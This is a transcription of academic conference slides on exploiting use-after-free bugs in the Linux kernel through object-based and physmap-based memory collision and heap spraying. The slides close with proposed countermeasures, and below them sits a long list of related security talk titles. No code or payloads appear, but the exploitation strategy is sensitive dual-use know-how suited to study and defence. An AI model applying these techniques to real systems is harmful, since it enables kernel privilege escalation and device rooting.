From Collision To Exploitation: Unleashing Use-After-Free Vulnerabilities in Linux Kernel
|
|
- Ashlee Pierce
- 5 years ago
- Views:
Transcription
1 From Collision To Exploitation: Unleashing Use-After-Free Vulnerabilities in Linux Kernel Wen Xu, Juanru Li, Junliang Shu, Wenbo Yang, Tianyi Xie, Yuanyuan Zhang, Dawu Gu Group of Software Security In Progress Lab of Cryptology and Computer Security Shanghai Jiao Tong University Shanghai Jiao Tong University CCS
2 Introduction Linux kernel becomes a welcomed target A complete control of the system Less protection and mitigation schemes Exploiting kernel bugs is non-trivial Few documented techniques Unpredictable memory layout Our goal is to find a generic way to exploiting use-after-free bugs in Linux kernel. CCS
3 Use-after-free in Linux kernel Option 2 is to free an object without cleaning the pointer obj[index] is so-called a dangling pointer since it points to a freed space Option 3 is to use an object without checking whether the pointer is valid Here use represents invoking a function pointer being stored in the object CCS
4 Exploiting use-after-free bugs Our goal to is re-occupy the vulnerable freed object with controllable data. The free memory is to be reused, which provides an opportunity for attackers to re-control the freed space. Controllable data contributes to unintended control-flow hijacking or data corruption in later using. CCS
5 Challenges Stability: The hole should be re-occupied by our candidates. Hundreds of scheduled tasks all affect kernel allocators. Separation: The hole should be re-occupied by proper candidates. Different types of kernel objects cannot be stored in the same memory region due to SLAB/SLUB. Data-control: The hole should be filled with meaningful content. The content of kernel objects are usually not fully controlled by users. Universality: One strategy regardless of types of vulnerable objects. CCS
6 Insight: Memory Collision Kernel recycles free memory for future use. Memory limitation Performance requirement Reduction of the entropy of memory layout Memory collision attack strategy To use proper candidates and let them be chosen by the kernel to occupy the recently freed space In fact, to collide with the freed hole Probabilistic model with high success rate CCS
7 Overview Object-based memory collision attack Candidate: kernel buffers allocated by kernel allocators Physmap-based memory collision attack Candidate: physmap Generic, stable and reliable CCS
8 Overview CCS
9 Object-based Attack Intuitive strategy To use kernel objects overwriting kernel objects Kernel objects are stored in various kinds of SLAB caches. Different caches are for different objects which implies a natural separation. How to insert an object of type A into the caches storing vulnerable objects of type B? CCS
10 Object-based Attack CCS
11 Object-based Attack #1 Collisions between Objects of the Same Size Savior: Newly adopted SLUB allocators Put objects of the same size into one cache for performance promotion. Candidate: kmalloc() buffers Used by kernel to store temporary data commonly Easy to create by users: sendmmsg() Controllable size: Length of control message Controllable content: Data of control message All passed from userspace CCS
12 Object-based Attack #1 Collisions between Objects of the Same Size Notice that the length of the message buffer should be the same as the size of the vulnerable object (512). Limitation: kmalloc() allocates space of a rounded size like 32, 48, 64, 128, 256, 512, 1024 What if the vulnerable object has a size of 576? 512 < 576 < 1024 CCS
13 Object-based Attack #2 Collisions between Objects of Different Sizes If all the objects in a cache are freed, the whole space of the cache is going to be recycled by the kernel. Is the space definitely to be re-used for a cache storing the objects of the original type? No. Kernel never cares about the history of free memory. Memory is just memory. Chances are that the space is going to be used for a new cache storing objects of a different type. CCS
14 Object-based Attack #2 Collisions between Objects of Different Sizes The attack code remains to be the same. No care about the size of our message buffer Pick a kmalloc() size you prefer Discussions Theoretically, collisions always happen eventually. Practically, such a kind of blind strategy suffers a low success rate. Usually due to the resource limitation, one user cannot own too many kmalloc() buffers in the kernel. CCS
15 Physmap-based Attack Get rid of restrictions provided by the kernel allocators. Again, memory is just memory. The kernel never claims that the memory once for kernel objects is always for kernel objects. We choose a candidate known as physmap to achieve a generic and stable attack against useafter-free vulnerabilities in Linux kernel. CCS
16 Physmap-based Attack Physmap, the direct-mapped memory, is memory in the kernel space which would directly map the memory in the user space into the kernel space. CCS
17 Physmap-based Attack An EXCELLENT choice Easy creation: iteratively mmap() in the user space Data-control: fully controlled by attackers for sure Large size: Physmap filled with our crafted payload grows in the kernel by occupying free kernel space. Table [1] from ret2dir: Rethinking Kernel Isolation (USENIX 14 ) CCS
18 Physmap-based Attack An intuitive strategy is to create a large amount of vulnerable objects and free all of them, then do the kernel spraying by physmap and hope the collision happens. A more reliable approach? CCS
19 Physmap-based Attack We spray vulnerable objects in groups, for each group: Considering N objects as vulnerable ones, we will later trigger the UAF vulnerability on them. Considering M(M >> N) objects as padding ones, we will just release them in a normal way. Result: (1) Large pieces of freed memory is waiting for physmap with payload to occupy. (2) We have vulnerable freed objects scatter all over the kernel space. These sharply increase the reliability of such a probabilistic attack. CCS
20 Physmap-based Attack In practical, we discover that users can get certain data inside many kernel objects by specific syscalls. That could help to inform attackers that the collisions have already happened and the spraying should be stopped. Further increase the reliability CCS
21 Security Effectiveness Physmap-based attack totally avoids the separation provided by the kernel allocators and achieves overwriting. Physmap originates from mmap() area in user space, thus it is fully under the control of attackers. Physmap is effective regardless of what type and size of the vulnerable object which has a use-after-free vulnerability. Certain spraying tricks and potential approaches to leaking information helps to increase the probability that memory collisions happen. Physmap-based attack leverages the inherent working mechanism of the kernel, which cannot be mitigated easily. CCS
22 Evaluation Here is the performance of all these attacks targeting on the custom vulnerable kernel module. In fact, the attack performs worse on 64bit Linux platform. And also both physmap-based attack and object-based attack #1 have a high success rate. CCS
23 Evaluation We achieve a reliable universal root solution on diverse Android devices by leverage CVE , a typical use-after-free vulnerabilities in Linux kernel credited to the author based on physmap-based attack. That implies our attack is applied both on x86/x86_64 and ARM architectures. CCS
24 Conclusion We propose a noval attack techniques to unleash use-after-free vulnerabilities in Linux kernel which features reliability and universality. Countermeasures To impose restrictions on available memory resources of a particular user. To make isolations among memory of different usages. CCS
25 Thank you! Q&A Shanghai Jiao Tong University CCS
KSMA: Breaking Android kernel isolation and Rooting with ARM MMU features. WANG, YONG a.k.a. Pandora Lab of Ali Security
KSMA: Breaking Android kernel isolation and Rooting with ARM MMU features WANG, YONG a.k.a. ThomasKing(@ThomasKing2014) Pandora Lab of Ali Security About WANG, YONG a.k.a. ThomasKing(@ThomasKing2014) Security
More informationA Heap of Trouble Exploiting the Linux Kernel SLOB Allocator
A Heap of Trouble Exploiting the Linux Kernel SLOB Allocator Dan Rosenberg 1 Who am I? Security consultant and vulnerability researcher at VSR in Boston App/net pentesting, code review, etc. Published
More informationSoftware Security II: Memory Errors - Attacks & Defenses
1 Software Security II: Memory Errors - Attacks & Defenses Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab1 Writeup 3 Buffer overflow Out-of-bound memory writes (mostly sequential) Allow
More informationMirror Mirror: Rooting Android 8 with a Kernel Space Mirroring Attack
Mirror Mirror: Rooting Android 8 with a Kernel Space Mirroring Attack WANG, YONG(@ThomasKing2014) Pandora Lab of Ali Security Who am I WANG, YONG a.k.a. ThomasKing(@ThomasKing2014) Security Engineer in
More informationThe Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel. Di Shen a.k.a. Retme Keen Lab of Tencent
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel Di Shen a.k.a. Retme (@returnsme) Keen Lab of Tencent whoami Di Shen a.k.a. Retme (@returnsme) Member of Keen Lab Android Kernel
More informationBuffer overflow background
and heap buffer background Comp Sci 3600 Security Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Address Space and heap buffer
More informationChangelog. Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part
1 Changelog 1 Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part OVER questions? 2 last time 3 memory management problems
More informationAdaptive Android Kernel Live Patching
USENIX Security Symposium 2017 Adaptive Android Kernel Live Patching Yue Chen 1, Yulong Zhang 2, Zhi Wang 1, Liangzhao Xia 2, Chenfu Bao 2, Tao Wei 2 Florida State University 1 Baidu X-Lab 2 Android Kernel
More informationkguard++: Improving the Performance of kguard with Low-latency Code Inflation
kguard++: Improving the Performance of kguard with Low-latency Code Inflation Jordan P. Hendricks Brown University Abstract In this paper, we introduce low-latency code inflation for kguard, a GCC plugin
More informationin memory: an evolution of attacks Mathias Payer Purdue University
in memory: an evolution of attacks Mathias Payer Purdue University Images (c) MGM, WarGames, 1983 Memory attacks: an ongoing war Vulnerability classes according to CVE Memory
More informationLinux Kernel Futex Fun: Exploiting CVE Dougall Johnson
Linux Kernel Futex Fun: Exploiting CVE-2014-3153 Dougall Johnson Overview Futex system call Kernel implementation CVE-2014-3153 My approach to exploiting it Futexes Fast user-space mutexes 32-bit integer
More informationHacking from ios 8 to ios 9 TEAM PANGU
Hacking from ios 8 to ios 9 TEAM PANGU POC 2015 Agenda ios Security Overview Security Changes from ios 8 to ios 9 Kernel Vulnerability Exploited in Pangu 9 Kernel Exploit Chain Conclusion Who We Are Team
More informationKernel Self Protection
Kernel Self Protection Kernel Summit 2016, Santa Fe Kees ( Case ) Cook keescook@chromium.org @kees_cook http://kernsec.org/wiki/index.php/kernel_self_protection_project http://www.openwall.com/lists/kernel-hardening/
More informationSecure Coding Techniques
Secure Coding Techniques "... the world outside your function should be treated as hostile and bent upon your destruction" [Writing Secure Code, Howard and LeBlanc] "Distrust and caution are the parents
More informationWINDOWS 10 RS2/RS3 GDI DATA-ONLY EXPLOITATION TALES
WINDOWS 10 RS2/RS3 GDI DATA-ONLY EXPLOITATION TALES NIKOLAOS SAMPANIS (@_sm4ck) nsampanis@census-labs.com OFFENSIVECON 2018 BERLIN www.census-labs.com > WHO AM I Computer security researcher at CENSUS
More informationPlay with FILE Structure Yet Another Binary Exploitation Technique. Abstract
Play with FILE Structure Yet Another Binary Exploitation Technique An-Jie Yang (Angelboy) angelboy@chroot.org Abstract To fight against prevalent cyber threat, more mechanisms to protect operating systems
More informationHonours/Master/PhD Thesis Projects Supervised by Dr. Yulei Sui
Honours/Master/PhD Thesis Projects Supervised by Dr. Yulei Sui Projects 1 Information flow analysis for mobile applications 2 2 Machine-learning-guide typestate analysis for UAF vulnerabilities 3 3 Preventing
More informationSoK: Eternal War in Memory
SoK: Eternal War in Memory László Szekeres, Mathias Payer, Tao Wei, Dawn Song Presenter: Wajih 11/7/2017 Some slides are taken from original S&P presentation 1 What is SoK paper? Systematization of Knowledge
More informationRuntime Integrity Checking for Exploit Mitigation on Embedded Devices
Runtime Integrity Checking for Exploit Mitigation on Embedded Devices Matthias Neugschwandtner IBM Research, Zurich eug@zurich.ibm.com Collin Mulliner Northeastern University, Boston collin@mulliner.org
More informationDynamic Memory Management! Goals of this Lecture!
Dynamic Memory Management!!! 1 Goals of this Lecture! Help you learn about:! Dynamic memory management techniques! Garbage collection by the run-time system (Java)! Manual deallocation by the programmer
More informationDissecting a 17-year-old kernel bug
Dissecting a 17-year-old kernel bug Vitaly Nikolenko bevx 2018 - Hong Kong https://www.beyondsecurity.com/bevxcon/ Agenda Vulnerability analysis CVE-2018-6554^ - memory leak CVE-2018-6555^ - privilege
More informationSoK: Eternal War in Memory Laszlo Szekeres, Mathias Payer, Tao Wei, and Dawn Song In: Oakland 14
SoK: Eternal War in Memory Laszlo Szekeres, Mathias Payer, Tao Wei, and Dawn Song In: Oakland 14 Presenter: Mathias Payer, EPFL http://hexhive.github.io 1 Memory attacks: an ongoing war Vulnerability classes
More informationCSCE 548 Building Secure Software Dirty COW Race Condition Attack
CSCE 548 Building Secure Software Dirty COW Race Condition Attack Professor Lisa Luo Spring 2018 Outline Dirty COW vulnerability Memory Mapping using mmap() Map_shared, Map_Private Mapping Read-Only Files
More informationLecture Notes: Unleashing MAYHEM on Binary Code
Lecture Notes: Unleashing MAYHEM on Binary Code Rui Zhang February 22, 2017 1 Finding Exploitable Bugs 1.1 Main Challenge in Exploit Generation Exploring enough of the state space of an application to
More informationFrom Thousands of Hours to a Couple of Minutes: Towards Automating Exploit Generation for Arbitrary Types of Kernel Vulnerabilities
From Thousands of Hours to a Couple of Minutes: Towards Automating Exploit Generation for Arbitrary Types of Kernel Vulnerabilities 1 Who are We? Wei Wu @wu_xiao_wei Visiting scholar at JD.com Conducting
More informationDynamic Memory Management
Dynamic Memory Management Professor Jennifer Rexford http://www.cs.princeton.edu/~jrex 1 Goals of Today s Lecture Dynamic memory management o Garbage collection by the run-time system (Java) o Manual deallocation
More informationFirst order of Business
First order of Business First order of Business You probably feel like this MBE TA s Hardware Enforced Model 0: Privileged, Kernelspace 3: Restricted, Userspace Hardware Enforced Model 0: Privileged,
More informationAttacking the Linux PRNG on Android. David Kaplan, Sagi Kedmi, Roee Hay & Avi Dayan IBM Security Systems
Attacking the Linux PRNG on Android David Kaplan, Sagi Kedmi, Roee Hay & Avi Dayan IBM Security Systems MOTIVATION motivation_keystore_buffer_overflow We discovered CVE-2014-3100, a stack-based Buffer
More informationDisclaimer. This talk vastly over-simplifies things. See notes for full details and resources.
Greg Kroah-Hartman Disclaimer This talk vastly over-simplifies things. See notes for full details and resources. https://github.com/gregkh/presentation-spectre Spectre Hardware bugs Valid code can be tricked
More informationCIS Operating Systems Non-contiguous Memory Allocation. Professor Qiang Zeng Spring 2018
CIS 3207 - Operating Systems Non-contiguous Memory Allocation Professor Qiang Zeng Spring 2018 Big picture Fixed partitions Dynamic partitions Buddy system Contiguous allocation: Each process occupies
More informationGuarder: A Tunable Secure Allocator
Guarder: A Tunable Secure Allocator Sam Silvestro, Hongyu Liu, and Tianyi Liu, University of Texas at San Antonio; Zhiqiang Lin, Ohio State University; Tongping Liu, University of Texas at San Antonio
More informationVulnerability Analysis I:
Vulnerability Analysis I: Exploit Hardening Made Easy Surgically Returning to Randomized Lib(c) Mitchell Adair September 9 th, 2011 Outline 1 Background 2 Surgically Returning to Randomized lib(c) 3 Exploit
More informationFasten your seatbelts: We are escaping ios 11 sandbox! Min(Spark) Zheng & Xiaolong Alibaba Security Lab
Fasten your seatbelts: We are escaping ios 11 sandbox! Min(Spark) Zheng & Xiaolong Bai @ Lab Whoami SparkZheng @ Twitter spark @ Weibo Expert CUHK PhD, Blue-lotus and Insight-labs ios 9.3.4 & ios 11.3.1
More informationRemix: On-demand Live Randomization
Remix: On-demand Live Randomization Yue Chen, Zhi Wang, David Whalley, Long Lu* Florida State University, Stony Brook University* Background Buffer Overflow -> Code Injection Attack Background Buffer Overflow
More informationSecure Containers with EPT Isolation
Secure Containers with EPT Isolation Chunyan Liu liuchunyan9@huawei.com Jixing Gu jixing.gu@intel.com Presenters Jixing Gu: Software Architect, from Intel CIG SW Team, working on secure container solution
More informationECE 598 Advanced Operating Systems Lecture 12
ECE 598 Advanced Operating Systems Lecture 12 Vince Weaver http://web.eece.maine.edu/~vweaver vincent.weaver@maine.edu 1 March 2018 Announcements Next homework will be due after break. Midterm next Thursday
More informationCling: A Memory Allocator to Mitigate Dangling Pointers. Periklis Akritidis
Cling: A Memory Allocator to Mitigate Dangling Pointers Periklis Akritidis --2010 Use-after-free Vulnerabilities Accessing Memory Through Dangling Pointers Techniques : Heap Spraying, Feng Shui Manual
More informationDisclaimer. This talk vastly over-simplifies things. See notes for full details and resources.
Greg Kroah-Hartman Disclaimer This talk vastly over-simplifies things. See notes for full details and resources. https://github.com/gregkh/presentation-spectre Spectre Hardware bugs Valid code can be tricked
More informationPerf: From Profiling to Kernel Mobile Threat Response Team
Perf: From Profiling to Kernel Exploiting @Wish_Wu Mobile Threat Response Team 0 The Perf Performance counters: = hardware features (CPU/PMU, Performance Monitoring Unit) + software features (software
More informationIdentifying Memory Corruption Bugs with Compiler Instrumentations. 이병영 ( 조지아공과대학교
Identifying Memory Corruption Bugs with Compiler Instrumentations 이병영 ( 조지아공과대학교 ) blee@gatech.edu @POC2014 How to find bugs Source code auditing Fuzzing Source Code Auditing Focusing on specific vulnerability
More informationMemory by the Slab. The Tale of Jeff Bonwick s Slab Allocator Ryan Zezeski // Sep 2015 // Papers We Love, NYC
Memory by the Slab The Tale of Jeff Bonwick s Slab Allocator Ryan Zezeski // Sep 2015 // Papers We Love, NYC Best Fit Fastest VS General Allocator? malloc(3c) & free(3c) Have no a priori knowledge of
More informationDieHarder: Securing the Heap
DieHarder: Securing the Heap Gene Novark Emery D. Berger Dept. of Computer Science University of Massachusetts Amherst Amherst, MA 01003 gnovark@cs.umass.edu, emery@cs.umass.edu Abstract Heap-based attacks
More informationJump Over ASLR: Attacking Branch Predictors to Bypass ASLR
Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR Presentation by Eric Newberry and Youssef Tobah Paper by Dmitry Evtyushkin, Dmitry Ponomarev, and Nael Abu-Ghazaleh 1 Motivation Buffer overflow
More informationRobust Shell Code Return Oriented Programming and HeapSpray. Zhiqiang Lin
CS 6V81-05: System Security and Malicious Code Analysis Robust Shell Code Return Oriented Programming and HeapSpray Zhiqiang Lin Department of Computer Science University of Texas at Dallas April 16 th,
More informationSecure Systems 2.0: Revisiting and Rethinking the Challenges of Secure System Design. Todd Austin University of Michigan
Secure Systems 2.0: Revisiting and Rethinking the Challenges of Secure System Design Todd Austin University of Michigan The Security Arms Race Question: Why are systems never safe? We deploy our designs
More informationUniSan: Proactive Kernel Memory Initialization to Eliminate Data Leakages
UniSan: Proactive Kernel Memory Initialization to Eliminate Data Leakages Kangjie Lu, Chengyu Song, Taesoo Kim, Wenke Lee School of Computer Science, Georgia Tech Any Problem Here? /* File: drivers/usb/core/devio.c*/
More informationGet the (Spider)monkey off your back
Get the (Spider)monkey off your back Exploiting Firefox through the Javascript engine by eboda and bkth from phoenhex Who are we? Security enthusiasts who dabble in vulnerability research on their free
More informationCIS Operating Systems Memory Management Address Translation. Professor Qiang Zeng Fall 2017
CIS 5512 - Operating Systems Memory Management Address Translation Professor Qiang Zeng Fall 2017 Outline Fixed partitions Dynamic partitions Con$guous alloca$on: Each process occupies a con$guous memory
More informationCSCE Operating Systems Non-contiguous Memory Allocation. Qiang Zeng, Ph.D. Fall 2018
CSCE 311 - Operating Systems Non-contiguous Memory Allocation Qiang Zeng, Ph.D. Fall 2018 Big picture Fixed partitions Dynamic partitions Buddy system Contiguous allocation: Each process occupies a contiguous
More informationJonathan Afek, 1/8/07, BlackHat USA
Dangling Pointer Jonathan Afek, 1/8/07, BlackHat USA 1 Table of Contents What is a Dangling Pointer? Code Injection Object Overwriting Demonstration Remediation Summary Q&A 2 What is a Dangling Pointer?
More informationECE 471 Embedded Systems Lecture 22
ECE 471 Embedded Systems Lecture 22 Vince Weaver http://www.eece.maine.edu/~vweaver vincent.weaver@maine.edu 31 October 2018 Don t forget HW#7 Announcements 1 Computer Security and why it matters for embedded
More informationModern Buffer Overflow Prevention Techniques: How they work and why they don t
Modern Buffer Overflow Prevention Techniques: How they work and why they don t Russ Osborn CS182 JT 4/13/2006 1 In the past 10 years, computer viruses have been a growing problem. In 1995, there were approximately
More informationBeyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus(MSR) and Brandon Baker (MS) Buffer Overflows and How they Occur Buffer is a contiguous segment of memory of a fixed
More informationKernel Memory Management
How does the kernel allocate and manage its own memory? Department of Computer Science UofC CPSC 457 October 24, 2014 Agenda Midterm Answers (5 minutes) Discussion of brk() system call. (20 minutes) (25
More informationMIRAGE : Randomizing Large Chunk Allocation Via Dynamic Binary Instrumentation
MIRAGE : Randomizing Large Chunk Allocation Via Dynamic Binary Instrumentation Zhenghao Hu tonyhu@sjtu.edu.cn Yuanyuan Zhang yyjess@sjtu.edu.cn Hui Wang tony-wh@sjtu.edu.cn Juanru Li romangol@securitygossip.com
More informationHow to Break Software by James Whittaker
How to Break Software by James Whittaker CS 470 Practical Guide to Testing Consider the system as a whole and their interactions File System, Operating System API Application Under Test UI Human invokes
More informationLecture 1: Buffer Overflows
CS5431 Computer Security Practicum Spring 2017 January 27, 2017 1 Conficker Lecture 1: Buffer Overflows Instructor: Eleanor Birrell In November 2008, a new piece of malware was observed in the wild. This
More informationPangu 9 Internals. Tielei Wang and Hao Xu
Pangu 9 Internals Tielei Wang and Hao Xu Team Pangu Agenda ios Security Overview Pangu 9 Overview Userland Exploits Kernel Patching in Kernel Patch Protections Persistent Code Signing Bypass Conclusion
More informationMissing the Point(er): On the Effectiveness of Code Pointer Integrity 1
2015 IEEE Symposium on Security and Privacy Missing the Point(er): On the Effectiveness of Code Pointer Integrity 1 Isaac Evans, Sam Fingeret, Julián González, Ulziibayar Otgonbaatar, Tiffany Tang, Howard
More informationLINUX VULNERABILITIES, WINDOWS EXPLOITS Escalating Privileges with WSL. Saar Amar Recon brx 2018
LINUX VULNERABILITIES, WINDOWS EXPLOITS Escalating Privileges with WSL Saar Amar Recon brx 2018 WHO AM I? Saar Amar Security Researcher @AmarSaar Pasten CTF team member saaramar OUTLINE World s quickest
More informationExtensions to Barrelfish Asynchronous C
Extensions to Barrelfish Asynchronous C Michael Quigley michaelforrquigley@gmail.com School of Computing, University of Utah October 27, 2016 1 Abstract The intent of the Microsoft Barrelfish Asynchronous
More informationSecurity Testing of Software on Embedded Devices Using x86 Platform
Security Testing of Software on Embedded Devices Using x86 Platform Yesheng Zhi( ), Yuanyuan Zhang, Juanru Li, and Dawu Gu Lab of Cryptology and Computer Security, Shanghai Jiao Tong University, Shanghai,
More informationEnhanced Operating System Security Through Efficient and Fine-grained Address Space Randomization
Enhanced Operating System Security Through Efficient and Fine-grained Address Space Randomization Anton Kuijsten Andrew S. Tanenbaum Vrije Universiteit Amsterdam 21st USENIX Security Symposium Bellevue,
More informationPatching Exploits with Duct Tape: Bypassing Mitigations and Backward Steps
SESSION ID: EXP-R01 Patching Exploits with Duct Tape: Bypassing Mitigations and Backward Steps James Lyne Global Head of Security Research Sophos / SANS Institute @jameslyne Stephen Sims Security Researcher
More informationLab 6: OS Security for the Internet of Things
Department of Computer Science: Cyber Security Practice Lab 6: OS Security for the Internet of Things Introduction The Internet of Things (IoT) is an emerging technology that will affect our daily life.
More informationMeltdown and Spectre - understanding and mitigating the threats (Part Deux)
Meltdown and Spectre - understanding and mitigating the threats (Part Deux) Gratuitous vulnerability logos Jake Williams @MalwareJake SANS / Rendition Infosec sans.org / rsec.us @SANSInstitute / @RenditionSec
More informationThe Art and Science of Memory Allocation
Logical Diagram The Art and Science of Memory Allocation Don Porter CSE 506 Binary Formats RCU Memory Management Memory Allocators CPU Scheduler User System Calls Kernel Today s Lecture File System Networking
More informationLab 6: OS Security for the Internet of Things
Department of Computer Science: Cyber Security Practice Lab 6: OS Security for the Internet of Things Introduction The Internet of Things (IoT) is an emerging technology that will affect our daily life.
More informationDieHarder: Securing the Heap
DieHarder: Securing the Heap Gene Novark Dept. of Computer Science University of Massachusetts Amherst gnovark@cs.umass.edu Abstract Heap-based attacks depend on a combination of memory management errors
More informationDynamic Memory Management
Dynamic Memory Management 1 Goals of this Lecture Help you learn about: Dynamic memory management techniques Garbage collection by the run-time system (Java) Manual deallocation by the programmer (C, C++)
More informationUniversità Ca Foscari Venezia
Stack Overflow Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it Introduction Buffer overflow is due to careless programming in unsafe languages like C
More informationProcess size is independent of the main memory present in the system.
Hardware control structure Two characteristics are key to paging and segmentation: 1. All memory references are logical addresses within a process which are dynamically converted into physical at run time.
More informationCNIT 127: Exploit Development. Ch 18: Source Code Auditing. Updated
CNIT 127: Exploit Development Ch 18: Source Code Auditing Updated 4-10-17 Why Audit Source Code? Best way to discover vulnerabilities Can be done with just source code and grep Specialized tools make it
More informationSafeMem: Exploiting ECC-Memory for Detecting Memory Leaks and Memory Corruption During Production Runs
SafeMem: Exploiting ECC-Memory for Detecting Memory Leaks and Memory Corruption During Production Runs Feng Qin, Shan Lu and Yuanyuan Zhou Department of Computer Science, University of Illinois at Urbana
More informationPractical and Efficient Exploit Mitigation for Embedded Devices
Practical and Efficient Exploit Mitigation for Embedded Devices Matthias Neugschwandtner IBM Research, Zurich Collin Mulliner Northeastern University, Boston Qualcomm Mobile Security Summit 2015 1 Embedded
More informationIs Exploitation Over? Bypassing Memory Protections in Windows 7
Is Exploitation Over? Bypassing Memory Protections in Windows 7 Alexander Sotirov alex@sotirov.net About me Exploit development since 1999 Published research into reliable exploitation techniques: Heap
More informationSecure Coding in C and C++
Secure Coding in C and C++ Dynamic Memory Management Lecture 5 Sept 21, 2017 Acknowledgement: These slides are based on author Seacord s original presentation Issues Dynamic Memory Management Common Dynamic
More informationCMPSC 497 Buffer Overflow Vulnerabilities
Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA CMPSC 497 Buffer Overflow
More informationUndermining Information Hiding (And What to do About it)
Undermining Information Hiding (And What to do About it) Enes Göktaş, Robert Gawlik, Benjamin Kollenda, Elias Athanasopoulos, Georgios Portokalidis, Cristiano Giuffrida, Herbert Bos Overview Mitigating
More informationLinux Security Summit Europe 2018
Linux Security Summit Europe 2018 Kernel Hardening: Protecting the Protection Mechanisms Igor Stoppa - igor.stoppa@huawei.com Cyber Security & Privacy Protection Labs - Huawei introduction memory classification
More informationPractical Techniques for Regeneration and Immunization of COTS Applications
Practical Techniques for Regeneration and Immunization of COTS Applications Lixin Li Mark R.Cornwell E.Hultman James E. Just R. Sekar Stony Brook University Global InfoTek, Inc (Research supported by DARPA,
More informationCurious case of Rowhammer: Flipping Secret Exponent Bits using Timing Analysis
Curious case of Rowhammer: Flipping Secret Exponent Bits using Timing Analysis Sarani Bhattacharya 1 and Debdeep Mukhopadhyay 1 Department of Computer Science and Engineering Indian Institute of Technology,
More informationBreaking Kernel Address Space Layout Randomization (KASLR) with Intel TSX. Yeongjin Jang, Sangho Lee, and Taesoo Kim Georgia Institute of Technology
Breaking Kernel Address Space Layout Randomization (KASLR) with Intel TSX Yeongjin Jang, Sangho Lee, and Taesoo Kim Georgia Institute of Technology Kernel Address Space Layout Randomization (KASLR) A statistical
More informationShared snapshots. 1 Abstract. 2 Introduction. Mikulas Patocka Red Hat Czech, s.r.o. Purkynova , Brno Czech Republic
Shared snapshots Mikulas Patocka Red Hat Czech, s.r.o. Purkynova 99 612 45, Brno Czech Republic mpatocka@redhat.com 1 Abstract Shared snapshots enable the administrator to take many snapshots of the same
More informationKCon. Breaking ios Mitigation Jails to Achieve Your Own Private Jailbreak. Min(Spark) Alibaba Mobile Security
KCon Breaking ios Mitigation Jails to Achieve Your Own Private Jailbreak Min(Spark) Zheng @ Alibaba Mobile Security ONLY AVAILABLE AT THE SCENE ios status Apple sold more than 1 billion ios devices. More
More informationEscaping The Sandbox By Not Breaking It
Escaping The Sandbox By Not Breaking It Marco Grassi Qidan He (@marcograss) (@flanker_hqd) About Us Marco Grassi Senior Security Researcher @ Tencent KEEN Lab Main Focus: Vulnerability Research, Android,
More informationOperating Systems. 11. Memory Management Part 3 Kernel Memory Allocation. Paul Krzyzanowski Rutgers University Spring 2015
Operating Systems 11. Memory Management Part 3 Kernel Memory Allocation Paul Krzyzanowski Rutgers University Spring 2015 1 Kernel memory The kernel also needs memory User code calls malloc kernel functions
More informationAttacking Next- Generation Firewalls
Attacking Next- Generation Firewalls Breaking PAN-OS Felix Wilhelm #whoami Security Researcher @ ERNW Research Application and Virtualization Security Recent Research Hypervisors (Xen) Security Appliances
More informationGeneral Pr0ken File System
General Pr0ken File System Hacking IBM s GPFS Felix Wilhelm & Florian Grunow 11/2/2015 GPFS Felix Wilhelm && Florian Grunow #2 Agenda Technology Overview Digging in the Guts of GPFS Remote View Getting
More informationSecure Coding in C and C++ Dynamic Memory Management Lecture 5 Jan 29, 2013
Secure Coding in C and C++ Dynamic Memory Management Lecture 5 Jan 29, 2013 Acknowledgement: These slides are based on author Seacord s original presentation Issues Dynamic Memory Management Common Dynamic
More informationFile System Implementations
CSE 451: Operating Systems Winter 2005 FFS and LFS Steve Gribble File System Implementations We ve looked at disks and file systems generically now it s time to bridge the gap by talking about specific
More informationMemory Allocator Security
Memory Allocator Security Yves Younan, Wouter Joosen, Frank Piessens and Hans Van den Eynden DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium Yves.Younan@cs.kuleuven.ac.be
More informationHow Double-Fetch Situations turn into Double-Fetch Vulnerabilities:
How Double-Fetch Situations turn into Double-Fetch Vulnerabilities: A Study of Double Fetches in the Linux Kernel Pengfei Wang, Jens Krinke, Kai Lu, Gen Li, Steve Dodier-Lazaro College of Computer National
More informationDocumentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
Documentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit about a generic way to exploit Linux targets written by Kingcope Introduction In May 2013 a security advisory was announced
More informationDepartment of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz I
Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY 6.893 Fall 2009 Quiz I All problems are open-ended questions. In order to receive credit you must answer
More informationRun-Time Environments/Garbage Collection
Run-Time Environments/Garbage Collection Department of Computer Science, Faculty of ICT January 5, 2014 Introduction Compilers need to be aware of the run-time environment in which their compiled programs
More informationSpectre, Meltdown, and the Impact of Security Vulnerabilities on your IT Environment. Orin Jeff Melnick
Spectre, Meltdown, and the Impact of Security Vulnerabilities on your IT Environment Orin Thomas @orinthomas Jeff Melnick Jeff.Melnick@Netwrix.com In this session Vulnerability types Spectre Meltdown Spectre
More informationAutomatic Garbage Collection
Automatic Garbage Collection Announcements: PS6 due Monday 12/6 at 11:59PM Final exam on Thursday 12/16 o PS6 tournament and review session that week Garbage In OCaml programs (and in most other programming
More informationCSE 565 Computer Security Fall 2018
CSE 565 Computer Security Fall 2018 Lecture 14: Software Security Department of Computer Science and Engineering University at Buffalo 1 Software Security Exploiting software vulnerabilities is paramount
More informationVersion:1.1. Overview of speculation-based cache timing side-channels
Author: Richard Grisenthwaite Date: January 2018 Version 1.1 Introduction This whitepaper looks at the susceptibility of Arm implementations following recent research findings from security researchers
More information